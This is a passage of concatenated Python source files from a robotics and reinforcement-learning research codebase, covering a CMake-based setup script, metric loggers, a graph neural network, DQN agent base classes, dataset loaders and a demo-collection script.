class CMakeBuild(build_ext):
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
if not extdir.endswith(os.path.sep):
extdir += os.path.sep
cfg = "Debug" if self.debug else "Release"
cmake_generator = os.environ.get("CMAKE_GENERATOR", "")
# Set Python_EXECUTABLE instead if you use PYBIND11_FINDPYTHON
cmake_args = [
"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY={}".format(extdir),
"-DPYTHON_EXECUTABLE={}".format(sys.executable),
"-DCMAKE_BUILD_TYPE={}".format(cfg), # not used on MSVC, but no harm
]
build_args = []
#if not cmake_generator:
# cmake_args += ["-GNinja"]
self.parallel = 16
if "CMAKE_BUILD_PARALLEL_LEVEL" not in os.environ:
if hasattr(self, "parallel") and self.parallel:
build_args += ["-j{}".format(self.parallel)]
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
print(cmake_args, build_args)
subprocess.check_call(
["cmake", ext.sourcedir] + cmake_args, cwd=self.build_temp
)
subprocess.check_call(
["cmake", "--build", "."] + build_args, cwd=self.build_temp
)
setup(
name="mplib",
version="0.0.4",
author_email="<EMAIL>",
keywords="robotics motion planning",
description="A lightweight motion planning library",
classifiers=[
"Operating System :: POSIX :: Linux",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Other Audience",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Framework :: Robot Framework :: Tool",
"Programming Language :: C++",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: Education",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities",
],
python_requires='>=3.6',
install_requires=["numpy >= 1.20", "toppra >= 0.4.0", "transforms3d >= 0.3.1"],
ext_modules=[CMakeExtension("_mplib")],
cmdclass={"build_ext": CMakeBuild},
zip_safe=False,
packages=["mplib"],
package_dir = {"mplib": "mplib/"}
)
``` |
{
"source": "Jiayuan-Gu/policy-refactorization",
"score": 2
} |
#### File: common/utils/metric_logger.py
```python
from __future__ import division
from collections import defaultdict
from collections import deque
import numpy as np
import torch
class Metric(object):
def update(self, *args, **kwargs):
raise NotImplementedError()
def reset(self):
raise NotImplementedError()
@property
def result(self):
raise NotImplementedError()
def __str__(self):
raise NotImplementedError()
@property
def summary_str(self):
raise NotImplementedError()
class Average(Metric):
"""Track a series of values and provide access to smoothed values over a
window or the global series average.
"""
default_fmt = '{avg:.4f} ({global_avg:.4f})'
default_summary_fmt = '{global_avg:.4f}'
def __init__(self, window_size=20, fmt=None, summary_fmt=None):
self.values = deque(maxlen=window_size)
self.counts = deque(maxlen=window_size)
self.sum = 0.0
self.count = 0
self.fmt = fmt or self.default_fmt
self.summary_fmt = summary_fmt or self.default_summary_fmt
def update(self, value, count=1):
self.values.append(value)
self.counts.append(count)
self.sum += value
self.count += count
def reset(self):
self.values.clear()
self.counts.clear()
self.sum = 0.0
self.count = 0
@property
def result(self):
return self.global_avg
def __str__(self):
return self.fmt.format(avg=self.avg, global_avg=self.global_avg)
@property
def summary_str(self):
return self.summary_fmt.format(global_avg=self.global_avg)
@property
def avg(self):
return np.sum(self.values) / np.sum(self.counts)
@property
def global_avg(self):
return self.sum / self.count if self.count != 0 else float('nan')
class Accuracy(Average):
default_fmt = '{avg:.2f} ({global_avg:.2f})'
default_summary_fmt = '{global_avg:.2f}'
def update(self, y_pred, y_true):
assert y_pred.shape == y_true.shape
if torch.is_tensor(y_pred) and torch.is_tensor(y_true):
mask = torch.eq(y_pred, y_true)
value = mask.float().sum().item()
count = mask.numel()
elif isinstance(y_pred, np.ndarray) and isinstance(y_true, np.ndarray):
mask = np.equal(y_pred, y_true)
value = mask.sum().item()
count = mask.size
else:
raise TypeError('{}, {}'.format(type(y_pred), type(y_true)))
super().update(value=value, count=count)
@property
def avg(self):
return super().avg * 100.0
@property
def global_avg(self):
return super().global_avg * 100.0
class MetricLogger(object):
"""Metric logger."""
def __init__(self, delimiter='\t'):
self.metrics = defaultdict(Average)
self.delimiter = delimiter
def update(self, **kwargs):
for k, v in kwargs.items():
if isinstance(v, torch.Tensor):
count = v.numel()
value = v.item() if count == 1 else v.sum().item()
elif isinstance(v, np.ndarray):
count = v.size
value = v.item() if count == 1 else v.sum().item()
elif isinstance(v, (tuple, list)):
value, count = v
value = value.item()
count = count.item()
elif isinstance(v, (float, int)):
value = v
count = 1
else:
                raise TypeError('Unsupported type: {}'.format(type(v)))
self.metrics[k].update(value, count)
def __getitem__(self, item):
return self.metrics[item]
def __str__(self):
ret_str = []
for name, metric in self.metrics.items():
ret_str.append('{}: {}'.format(name, str(metric)))
return self.delimiter.join(ret_str)
@property
def summary_str(self):
ret_str = []
for name, metric in self.metrics.items():
ret_str.append('{}: {}'.format(name, metric.summary_str))
return self.delimiter.join(ret_str)
def reset(self):
for metric in self.metrics.values():
metric.reset()
def test_Accuracy():
acc_metric = Accuracy()
acc_metric.update(np.array([1, 0, 1]), np.array([1, 0, 0]))
np.testing.assert_allclose(acc_metric.result, 2.0 / 3.0 * 100.0)
print(acc_metric)
acc_metric.update(torch.tensor([1, 0, 1]), torch.tensor([1, 0, 1]))
np.testing.assert_allclose(acc_metric.result, 5.0 / 6.0 * 100.0)
print(acc_metric)
```
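`MetricLogger.update` accepts plain scalars, tensors/arrays (summed, with the element count used as the weight), and explicit `(value, count)` pairs. A small usage sketch, assuming the repository root is on `PYTHONPATH` so the module above is importable:
```python
# Hypothetical usage of MetricLogger; values are arbitrary.
import torch
from common.utils.metric_logger import MetricLogger

meters = MetricLogger(delimiter='  ')
for step in range(3):
    # scalar -> count 1; tensor -> summed over elements, count = numel
    meters.update(loss=0.5 / (step + 1), acc=torch.tensor([1.0, 0.0, 1.0]))
print(meters)              # windowed and global averages per metric
print(meters.summary_str)  # global averages only
```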
#### File: common/utils/misc.py
```python
import os
import numpy as np
import torch
import gzip
import pickle
def print_dict(d: dict):
"""Print the given dictionary for debugging."""
for k, v in d.items():
if isinstance(v, (np.ndarray, torch.Tensor)):
print(k, v.shape)
else:
print(k, v)
def dynamic_load_modules(target_dir, context,
excludes=('__init__.py',),
verbose=True):
"""Load all the python files(.py) in the current directory.
Notes:
It is suggested to import modules explicitly.
However, sometimes, we may temporarily add some modules to experiments,
but do not want to include them in git or hope the program can still run
when we remove the experimental modules.
"from xxx import *" is not encouraged, unless __all__ is controlled carefully.
"""
all_filenames = os.listdir(target_dir)
py_filenames = [x for x in all_filenames if x.endswith('.py') and x not in excludes]
if verbose:
print(py_filenames)
module_names = [os.path.splitext(x)[0] for x in py_filenames]
for name in module_names:
exec('from .{} import *'.format(name), context)
def dump_pickle(obj, path):
if path.endswith('.pkl'):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
elif path.endswith('.pgz'):
with gzip.open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
else:
raise RuntimeError('Unsupported extension {}.'.format(os.path.splitext(path)[-1]))
def load_pickle(path):
if path.endswith('.pkl'):
with open(path, 'rb') as f:
return pickle.load(f)
elif path.endswith('.pgz'):
with gzip.open(path, 'rb') as f:
return pickle.load(f)
else:
raise RuntimeError('Unsupported extension {}.'.format(os.path.splitext(path)[-1]))
```
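`dump_pickle` and `load_pickle` dispatch on the file extension: `.pkl` is a plain pickle, `.pgz` a gzip-compressed one. A round-trip sketch with throwaway paths:
```python
# Assumes the module above is importable as common.utils.misc.
from common.utils.misc import dump_pickle, load_pickle

obj = {'a': 1, 'b': [1, 2, 3]}
dump_pickle(obj, '/tmp/example.pkl')  # plain pickle
dump_pickle(obj, '/tmp/example.pgz')  # gzip-compressed pickle
assert load_pickle('/tmp/example.pkl') == load_pickle('/tmp/example.pgz') == obj
```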
#### File: refactorization/models_gnn/ec_net.py
```python
import torch
import torch.nn as nn
import torch_geometric.nn as gnn
from torch_geometric.nn import EdgeConv
from refactorization.models_gnn.base import BaseGNN
class EdgeConvNet(BaseGNN):
def __init__(self, global_aggr='max', output_dim=3):
super(BaseGNN, self).__init__()
self.output_dim = output_dim
self.encoder = nn.Sequential(
nn.Conv2d(3, 16, 3, padding=1, bias=True), nn.ReLU(),
nn.MaxPool2d(2, 2), # [8, 8]
nn.Conv2d(16, 32, 3, padding=1, bias=True), nn.ReLU(),
nn.MaxPool2d(2, 2), # [4, 4]
nn.Conv2d(32, 64, 3, padding=1, bias=False), nn.GroupNorm(4, 64), nn.ReLU(),
nn.MaxPool2d(2, 2), # [2, 2]
nn.Conv2d(64, 128, 3, padding=1, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
nn.MaxPool2d(2, 2), # [1, 1]
)
local_nn = nn.Sequential(
nn.Linear((128 + 4) * 2, 128, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
nn.Linear(128, 128, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
nn.Linear(128, 128, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
)
self.gnn = EdgeConv(local_nn, aggr='max')
self.encoder2 = nn.Sequential(
nn.Linear(128, 128, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
nn.Linear(128, 128, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
)
self.global_aggr = global_aggr
self.fc = nn.Sequential(
nn.Linear(128, 128, bias=True), nn.ReLU(),
nn.Linear(128, 128, bias=True), nn.ReLU(),
nn.Linear(128, output_dim),
)
self.reset_parameters()
def forward(self, data, batch_size=None, **kwargs):
x = data.x
batch = data.batch
edge_index = data.edge_index
pos = data.pos
# infer real batch size, in case empty sample
if batch_size is None:
batch_size = data['size'].sum().item()
img_feature = self.encoder(x).flatten(1)
x = torch.cat([img_feature, pos], dim=1)
x = self.gnn(x=x, edge_index=edge_index)
x = self.encoder2(x)
if self.global_aggr == 'max':
global_feature = gnn.global_max_pool(x, batch, size=batch_size)
elif self.global_aggr == 'sum':
global_feature = gnn.global_add_pool(x, batch, size=batch_size)
else:
raise NotImplementedError()
logits = self.fc(global_feature)
out_dict = {
'logits': logits,
}
return out_dict
def test():
from common.utils.misc import print_dict
from torch_geometric.data import Data, Batch
model = EdgeConvNet()
print(model)
data = Data(
x=torch.rand(4, 3, 16, 16),
action=torch.randint(3, [1]),
pos=torch.rand(4, 4),
edge_index=torch.tensor([[0, 1, 2, 3], [1, 2, 3, 0]], dtype=torch.int64),
size=torch.tensor([1], dtype=torch.int64),
)
data_batch = Batch.from_data_list([data])
pd_dict = model(data_batch)
print_dict(pd_dict)
loss_dict = model.compute_losses(pd_dict, data_batch)
print_dict(loss_dict)
```
#### File: rl_libarary/agent/BaseAgent.py
```python
import torch
import numpy as np
import torch.multiprocessing as mp
from collections import deque
from skimage.io import imsave
# from ..utils import *
from ..utils.logger import Logger, GlobalLogger
from ..utils.normalizer import build_normalizer
from ..utils.misc import mkdir, close_obj, has_flag
from ..utils.torch_utils import random_seed
import logging
from ..component.envs import Task
from common.utils.checkpoint import CheckpointerV2_RL
from ..network.network_builder import build_network
import pickle
def update_dict_with_key_map(d1, d2, key_map):
for k1, k2 in key_map.items():
if k1 not in d1:
raise Exception('k1 not in d1')
if k2 not in d2:
raise Exception('k2 not in d2')
d1[k1] = d2[k2]
class BaseAgent:
def __init__(self, config):
self.config = config
self.logger = GlobalLogger(logging.getLogger('RL'), config.final_output_dir, 0)
self.task_ind = 0
self.state_normalizer = build_normalizer(config.RL.state_normalizer)
self.reward_normalizer = build_normalizer(config.RL.reward_normalizer)
self.checkpointer = None
self.first_eval = True
def close(self):
close_obj(self.task)
close_obj(self.evaluator)
def lazy_init_checkpointer(self):
if self.checkpointer is None:
self.checkpointer = CheckpointerV2_RL(self.network,
state_normalizer=self.state_normalizer,
optimizer=self.optimizer,
save_dir=self.config.final_output_dir,
logger=self.logger,
max_to_keep=self.config.train.n_checkpoints_to_keep)
def save(self, tag=None):
self.lazy_init_checkpointer()
filename = '{:d}'.format(self.total_steps)
if tag: filename += ('_' + tag)
self.checkpointer.save(filename)
def try_to_load_network(self):
config = self.config
if config.load_ckpt:
self.load(config.load_ckpt)
def load(self, ckpt_path):
self.lazy_init_checkpointer()
self.checkpointer.load(ckpt_path, resume=False, resume_states=False)
def eval_episodes(self):
if self.config.eval.is_async and not self.first_eval:
self.evaluator.query_eval_done() # let the training wait for evaluation
self.first_eval = False
self.evaluator.eval_episodes(self.total_steps)
def record_online_return(self, info, offset=0):
# pass
if isinstance(info, dict):
if 'episodic_return' in info: # wrapped by OriginalReturnWrapper
ret = info['episodic_return']
elif 'episode' in info: # procgen env
ret = info['episode']['r']
else:
return
if ret is not None:
self.logger.add_scalar('episodic_return_train', ret, self.total_steps + offset)
if not has_flag(self.config.train, 'hide_episodic_return'):
self.logger.info('steps %d, episodic_return_train %s' % (self.total_steps + offset, ret))
elif isinstance(info, tuple) or isinstance(info, list):
for i, info_ in enumerate(info):
self.record_online_return(info_, i)
else:
raise NotImplementedError
def switch_task(self):
config = self.config
# if not config.tasks:
if not hasattr(config, 'tasks'):
return
segs = np.linspace(0, config.max_steps, len(config.tasks) + 1)
if self.total_steps > segs[self.task_ind + 1]:
self.task_ind += 1
self.task = config.tasks[self.task_ind]
self.states = self.task.reset()
self.states = config.state_normalizer(self.states)
def record_episode(self, dir, env):
mkdir(dir)
steps = 0
state = env.reset()
while True:
self.record_obs(env, dir, steps)
action = self.record_step(state)
state, reward, done, info = env.step(action)
ret = info[0]['episodic_return']
steps += 1
if ret is not None:
break
def record_step(self, state):
raise NotImplementedError
# For DMControl
def record_obs(self, env, dir, steps):
env = env.env.envs[0]
obs = env.render(mode='rgb_array')
imsave('%s/%04d.png' % (dir, steps), obs)
# from ..component.envs import LazyFrames
class BaseActor(mp.Process):
STEP = 0
RESET = 1
EXIT = 2
SPECS = 3
NETWORK = 4
CACHE = 5
def __init__(self, config, lock):
mp.Process.__init__(self)
self.config = config
self.lock = lock
self.state_normalizer = build_normalizer(config.RL.state_normalizer)
self.__pipe, self.__worker_pipe = mp.Pipe()
self._state = None
self._task = None
self._network = None
self._total_steps = 0
self.__cache_len = 2
if not config.DQN.async_actor:
self.start = lambda: None
self.step = self._sample
self._set_up()
# self._task = self.task_fn()
self._task = self.build_task()
def build_task(self):
config = self.config
return Task(config.task.full_name, **dict(config.other))
def _sample(self):
transitions = []
for _ in range(self.config.DQN.sgd_update_frequency):
transitions.append(self._transition())
return transitions
def run(self):
self._set_up()
config = self.config
# self._task = self.task_fn()
self._task = self.build_task()
if hasattr(self.config.other, 'save_all_experience'):
import h5py
self.h5_data = h5py.File(self.config.other.save_all_experience, mode='w')
cache = deque([], maxlen=2)
while True:
op, data = self.__worker_pipe.recv()
if op == self.STEP:
if not len(cache):
cache.append(self._sample())
cache.append(self._sample())
self.__worker_pipe.send(cache.popleft())
cache.append(self._sample())
elif op == self.EXIT:
self.__worker_pipe.close()
if hasattr(self.config.other, 'save_all_experience'):
self.h5_data.close()
print('@@@@@@@@@@@@@@@@ close h5')
return
elif op == self.NETWORK:
self._network = data
else:
raise NotImplementedError
def _transition(self):
raise NotImplementedError
def _set_up(self):
pass
def step(self):
self.__pipe.send([self.STEP, None])
return self.__pipe.recv()
def close(self):
if self.config.DQN.async_actor:
self.__pipe.send([self.EXIT, None])
self.__pipe.close()
def set_network(self, net):
if not self.config.DQN.async_actor:
self._network = net
else:
self.__pipe.send([self.NETWORK, net])
from ..utils.logger import EvalResultsWriter
class BaseEvaluator(mp.Process):
EVAL = 0
EXIT = 1
NETWORK = 2
# LOG = 3
def __init__(self, config, lock, logger):
mp.Process.__init__(self)
self.config = config
self.lock = lock
self.logger = logger
self.state_normalizer = build_normalizer(config.RL.state_normalizer)
if config.eval.is_async:
self.__pipe, self.__worker_pipe = mp.Pipe()
self.task = None
self.network_outside = None # this is just a handle
self.network = None
else:
self.start = lambda: None
self.close = lambda: None
self.eval_episodes = self._eval_episodes
self._set_up()
# self.task = self.task_fn()
self.task = self.build_task()
self.network = build_network(config)
# self.results_writer = self.results_writer_fn()
self.results_writer = self.build_writer()
def build_task(self):
config = self.config
return Task(config.task.full_name,
num_envs=config.eval.n_episodes if config.eval.parallel else 1,
single_process=not config.eval.env_subprocess,
**dict(config.other))
def build_writer(self):
config = self.config
return EvalResultsWriter('{:s}/eval'.format(config.final_output_dir) if config.final_output_dir else None,
header={'env_id' : config.task.full_name})
def run(self):
self._set_up()
random_seed()
config = self.config
# self.task = self.task_fn()
self.task = self.build_task()
self.network = build_network(config)
# self.results_writer = self.results_writer_fn()
self.results_writer = self.build_writer()
while True:
op, data = self.__worker_pipe.recv()
if op == self.EVAL:
eval_done = self._eval_episodes(data)
self.__worker_pipe.send(eval_done)
# steps, mean, std = self._eval_episodes(data)
# self.__worker_pipe.send((steps, mean, std))
elif op == self.EXIT:
self.__worker_pipe.close()
return
elif op == self.NETWORK:
self.network_outside = data
else:
raise NotImplementedError
def _set_up(self):
pass
def close(self):
self.__pipe.send([self.EXIT, None])
self.__pipe.close()
def set_network(self, net):
if not self.config.eval.is_async:
self.network_outside = net
else:
self.__pipe.send([self.NETWORK, net])
def query_eval_done(self):
eval_done = self.__pipe.recv()
return eval_done
def eval_episodes(self, current_steps):
self.__pipe.send([self.EVAL, current_steps])
def eval_single_episode(self):
env = self.task
state = env.reset()
while True:
action = self.eval_step(state)
state, reward, done, info = env.step(action)
ret = info[0]['episodic_return']
if ret is not None:
break
return ret
def _eval_episodes(self, steps):
with self.lock: # copy the network weight
self.network.load_state_dict(self.network_outside.state_dict())
self.network.eval()
if self.config.eval.parallel:
episodic_returns = self.eval_episode_parallel()
else:
episodic_returns = self.eval_episode_sequential()
# print('@@@@@@@@@@@@@@@@@@@@ eval done')
self.logger.info('steps %d, *** episodic_return_test %.3f (std = %.2f)' % (
steps, np.mean(episodic_returns), np.std(episodic_returns)
))
self.logger.add_scalar('episodic_return_test', np.mean(episodic_returns), steps)
self.results_writer.write_row(steps, episodic_returns)
return True
# return steps, np.mean(episodic_returns), np.std(episodic_returns)
def eval_episode_parallel(self):
episodic_returns = [ None for _ in range(self.config.eval.n_episodes) ]
done_cnt = 0
env = self.task
state = env.reset()
step_cnt = 0
while True:
step_cnt += 1
action = self.eval_step(state)
state, reward, done, info = env.step(action)
for i_env, _info in enumerate(info):
ret = _info['episodic_return']
if episodic_returns[i_env] is None and ret is not None:
episodic_returns[i_env] = ret
done_cnt += 1
if done_cnt >= self.config.eval.n_episodes:
# print('@@@@@@@@ eval step cnt:', step_cnt)
return episodic_returns
def eval_episode_sequential(self):
episodic_returns = []
for ep in range(self.config.eval.n_episodes):
total_rewards = self.eval_single_episode()
episodic_returns.append(np.sum(total_rewards))
return episodic_returns
def eval_step(self, state):
raise NotImplementedError
```
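The `update_dict_with_key_map` helper at the top of this file copies selected entries of `d2` into `d1` under remapped key names, raising if either side of the mapping is missing. A quick sketch with made-up keys:
```python
# Made-up keys; assumes the function is importable from the module above.
from rl_libarary.agent.BaseAgent import update_dict_with_key_map

d1 = {'encoder.weight': None, 'encoder.bias': None}
d2 = {'backbone.weight': 1, 'backbone.bias': 2}
update_dict_with_key_map(d1, d2, {'encoder.weight': 'backbone.weight',
                                  'encoder.bias': 'backbone.bias'})
print(d1)  # {'encoder.weight': 1, 'encoder.bias': 2}
```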
#### File: rl_libarary/network/network_utils.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# from ..utils import *
class BaseNet:
def __init__(self):
pass
def layer_init(layer, w_scale=1.0):
nn.init.orthogonal_(layer.weight.data)
layer.weight.data.mul_(w_scale)
nn.init.constant_(layer.bias.data, 0)
return layer
def make_mlp(in_channels, mlp_channels, act_builder=nn.ReLU, last_act=True):
c_in = in_channels
module_list = []
for idx, c_out in enumerate(mlp_channels):
module_list.append(nn.Linear(c_in, c_out))
if last_act or idx < len(mlp_channels) - 1:
module_list.append(act_builder())
c_in = c_out
return nn.Sequential(*module_list)
```
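`make_mlp` stacks `Linear` layers with an activation after each one and can skip the activation on the last layer. A shape-check sketch, assuming the package above is importable:
```python
import torch
from rl_libarary.network.network_utils import make_mlp

mlp = make_mlp(in_channels=8, mlp_channels=[32, 32, 4], last_act=False)
x = torch.randn(5, 8)
print(mlp)           # Linear(8->32), ReLU, Linear(32->32), ReLU, Linear(32->4)
print(mlp(x).shape)  # torch.Size([5, 4])
```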
#### File: rl_libarary/utils/logger.py
```python
from tensorboardX import SummaryWriter
import os
import os.path as osp
import numpy as np
import torch
import logging
# logging.basicConfig(format='%(asctime)s - %(levelname)s: %(message)s')
import sys
def setup_logger(name, save_dir, comment=''):
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
if save_dir:
filename = 'log'
if comment:
filename += '.' + comment
log_file = os.path.join(save_dir, filename + '.txt')
fh = logging.FileHandler(log_file)
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
class Logger(object):
def __init__(self, vanilla_logger, log_dir, log_level=0):
self.log_level = log_level
self.writer = None
if vanilla_logger is not None:
self.info = vanilla_logger.info
self.debug = vanilla_logger.debug
self.warning = vanilla_logger.warning
self.all_steps = {}
self.log_dir = log_dir
def lazy_init_writer(self):
if self.log_dir and self.writer is None:
self.writer = SummaryWriter(self.log_dir, flush_secs=30)
def to_numpy(self, v):
if isinstance(v, torch.Tensor):
v = v.cpu().detach().numpy()
return v
def get_step(self, tag):
if tag not in self.all_steps:
self.all_steps[tag] = 0
step = self.all_steps[tag]
self.all_steps[tag] += 1
return step
def add_scalar(self, tag, value, step=None, log_level=0):
if not self.log_dir:
return
self.lazy_init_writer()
if log_level > self.log_level:
return
value = self.to_numpy(value)
if step is None:
step = self.get_step(tag)
if np.isscalar(value):
value = np.asarray([value])
self.writer.add_scalar(tag, value, step)
def add_histogram(self, tag, values, step=None, log_level=0):
if not self.log_dir:
return
self.lazy_init_writer()
if log_level > self.log_level:
return
values = self.to_numpy(values)
if step is None:
step = self.get_step(tag)
self.writer.add_histogram(tag, values, step)
def flush(self):
if not self.log_dir:
return
self.writer.flush()
from tensorboardX import GlobalSummaryWriter
class tmuGlobalSummaryWriter(GlobalSummaryWriter):
def __init__(self, *args, **kwargs):
super(tmuGlobalSummaryWriter, self).__init__(*args, **kwargs)
def add_scalar(self, tag, scalar_value, global_step, walltime=None):
"""add scalar with given global step"""
with self.lock:
self.smw.add_scalar(tag, scalar_value, global_step, walltime)
class GlobalLogger(Logger):
def __init__(self, vanilla_logger, log_dir, log_level=0):
super(GlobalLogger, self).__init__(vanilla_logger, log_dir)
self.add_histogram = None
if log_dir:
self.writer = tmuGlobalSummaryWriter(self.log_dir, flush_secs=30)
# def lazy_init_writer(self):
# if self.log_dir and self.writer is None:
# self.writer = tmuGlobalSummaryWriter.getSummaryWriter(self.log_dir)
def add_scalar(self, tag, value, step=None, log_level=0):
if not self.log_dir:
return
# self.lazy_init_writer()
if log_level > self.log_level:
return
value = self.to_numpy(value)
if step is None:
step = self.get_step(tag)
if np.isscalar(value):
value = np.asarray([value])
self.writer.add_scalar(tag, value, step)
import json, csv
class EvalResultsWriter(object):
def __init__(self, filename, header=''):
if not filename:
return
EXT = 'csv'
if not filename.endswith(EXT):
if osp.isdir(filename):
filename = osp.join(filename, EXT)
else:
filename = filename + "." + EXT
self.f = open(filename, "wt")
if isinstance(header, dict):
header = '# {} \n'.format(json.dumps(header))
self.f.write(header)
self.logger = csv.writer(self.f)
self.logger.writerow(['step', 'ep_rewards'])
self.f.flush()
def write_row(self, step, ep_rewards):
if hasattr(self, 'logger'):
self.logger.writerow([step] + ep_rewards)
self.f.flush()
```
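`setup_logger` wires a stdout handler plus an optional file handler, and `GlobalLogger` combines that logger with a tensorboardX writer. A minimal wiring sketch (paths are placeholders; assumes tensorboardX is installed):
```python
import logging
import os
from rl_libarary.utils.logger import setup_logger, GlobalLogger

log_dir = '/tmp/run0'
os.makedirs(log_dir, exist_ok=True)
setup_logger('RL', log_dir)                     # console + /tmp/run0/log.txt
logger = GlobalLogger(logging.getLogger('RL'), log_dir)
logger.info('starting')
logger.add_scalar('episodic_return_train', 1.23, step=0)
```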
#### File: space/datasets/build.py
```python
from torch.utils.data.sampler import RandomSampler, BatchSampler
from torch.utils.data.dataloader import DataLoader
from common.utils.torch_utils import worker_init_fn
from common.utils.sampler import IterationBasedBatchSampler
def build_dataset(cfg, training=True):
dataset_kwargs = cfg.DATASET.get('TRAIN' if training else 'VAL')
if cfg.DATASET.NAME == 'FallingDigit':
from .falling_digit import FallingDigit
dataset = FallingDigit(to_tensor=True, **dataset_kwargs)
else:
raise ValueError('Unsupported dataset: {}.'.format(cfg.DATASET.NAME))
return dataset
def build_dataloader(cfg, training=True, start_iter=0):
dataset = build_dataset(cfg, training=training)
worker_seed = cfg.RNG_SEED if cfg.RNG_SEED >= 0 else None
if training:
sampler = RandomSampler(dataset, replacement=False)
batch_sampler = BatchSampler(sampler, batch_size=cfg.TRAIN.BATCH_SIZE, drop_last=True)
batch_sampler = IterationBasedBatchSampler(batch_sampler,
num_iterations=cfg.TRAIN.MAX_ITER,
start_iter=start_iter)
dataloader = DataLoader(
dataset,
batch_sampler=batch_sampler,
num_workers=cfg.TRAIN.NUM_WORKERS,
worker_init_fn=lambda worker_id: worker_init_fn(worker_id, base_seed=worker_seed),
)
else:
dataloader = DataLoader(
dataset,
batch_size=cfg.VAL.BATCH_SIZE,
shuffle=True, # For visualization
# shuffle=False,
drop_last=False,
num_workers=cfg.VAL.NUM_WORKERS,
worker_init_fn=lambda worker_id: worker_init_fn(worker_id, base_seed=worker_seed),
)
return dataloader
```
#### File: space/datasets/falling_digit.py
```python
import pickle
import numpy as np
import cv2
import torch
from torch.utils.data.dataset import Dataset
import warnings
class FallingDigit(Dataset):
def __init__(self, path, start=0, end=-1, image_size=(128, 128), transform=None, to_tensor=True):
self.path = path
with open(path, 'rb') as f:
self.data = pickle.load(f)
self.data = self.data[start:(None if end == -1 else end)]
self.image_size = image_size
assert isinstance(image_size, tuple)
self.transform = transform # data augmentation
self.to_tensor = to_tensor
def __getitem__(self, index):
data = self.data[index]
if 'image' in data:
image = data['image']
else:
image = data['original_image']
assert image.dtype == np.uint8
# resize if necessary
if image.shape[:2] != self.image_size:
warnings.warn('Resize image from {} to {}'.format(image.shape, self.image_size))
image = cv2.resize(image, self.image_size[::-1], interpolation=cv2.INTER_AREA)
if self.transform is not None:
image_pil = self.transform(image)
image = np.asarray(image_pil)
assert image.dtype == np.uint8
image = np.asarray(image, dtype=np.float32) / 255.
if self.to_tensor:
image = np.transpose(image, [2, 0, 1]) # (c, h, w)
image = torch.tensor(image, dtype=torch.float32)
out_dict = {
'image': image,
}
return out_dict
def __len__(self):
return len(self.data)
def __str__(self):
return '{:s}: {:d} images.'.format(self.__class__.__name__, len(self))
def test():
import os.path as osp
from space.utils.plt_utils import show_image
_ROOT_DIR = osp.join(osp.dirname(__file__), '../..')
path = osp.join(_ROOT_DIR, 'data/falling_digit/FallingDigit_3-v0_n_72000_lv_0_to_3000_from_gt_policy.pkl')
dataset = FallingDigit(path, to_tensor=False)
for i in range(0, 10):
data = dataset[i]
image = data['image']
show_image(image)
```
#### File: policy-refactorization/tools/collect_demo_dataset_for_falling_digit.py
```python
from __future__ import division
import os
import os.path as osp
import argparse
import pickle
from tqdm import tqdm
import numpy as np
import random
# import torch
import cv2
import sys
_ROOT_DIR = osp.abspath(osp.dirname(__file__) + '/..')
sys.path.insert(0, _ROOT_DIR)
from rl_libarary.utils.config import generate_eval_config
from rl_libarary.agent.DQN_agent import DQNAgent
from rl_libarary.component.envs import Task
class EnvDataProvider(object):
def __init__(self, env_name, ckpt, config_file, args):
self.args = args
self.config = generate_eval_config(config_file, env_name)
self.agent = DQNAgent(self.config)
self.agent.load(ckpt)
self.agent.evaluator.network.load_state_dict(self.agent.network.state_dict())
self.env = self.agent.evaluator.task.env.envs[0].env # this env only transpose image
def get_episode(self, level_idx):
ep_data = []
s = self.env.reset(chosen_level_idx=level_idx) # must passed by kwargs
tot_rewards = 0
done = False
while not done:
original_img = self.env.render(mode='rgb_array') # (128, 128, 3)
q = self.agent.evaluator.eval_q([s])
ep_data.append({ 'original_image': original_img, # (128, 128, 3) of uint8
'q': q, # (3, ) of float32
})
if self.args.vis:
cv2.imshow('game', original_img[:, :, ::-1]) # convert RGB to BGR
cv2.waitKey(1)
                input()  # pause so the rendered frame can be inspected before stepping
if done:
# print('ep_r:', tot_rewards)
break
s, r, done, _ = self.env.step(np.argmax(q))
tot_rewards += r
if tot_rewards >= self.args.reward_th:
return ep_data
else:
return None
def close(self):
self.agent.close()
def parse_args():
parser = argparse.ArgumentParser(description='abc')
parser.add_argument(
'--cfg',
dest='config_file',
default='',
metavar='FILE',
help='path to config file',
type=str,
required=True,
)
parser.add_argument('--output-dir', default=osp.join(osp.dirname(__file__), '../data'),
type=str, help='output directory')
parser.add_argument('--vis', action='store_true', help='whether to visualize')
parser.add_argument('--env', type=str, required=True)
parser.add_argument('--ckpt', type=str, required=True)
parser.add_argument('--comment', type=str)
parser.add_argument('--reward-th', default=2.99, type=float)
parser.add_argument('--start_level', default=0, type=int)
parser.add_argument('--num_levels', default=3000, type=int)
args = parser.parse_args()
return args
def main():
"""
python tools/collect_demo_dataset_for_falling_digit.py --env FallingDigitCIFAR_3-v1 --cfg configs/falling_digit_rl/dqn_relation_net_eval.yml --ckpt
"""
args = parse_args()
e = EnvDataProvider(env_name=args.env, ckpt=args.ckpt, config_file=args.config_file, args=args)
results = []
for i in tqdm(range(args.start_level, args.start_level + args.num_levels)):
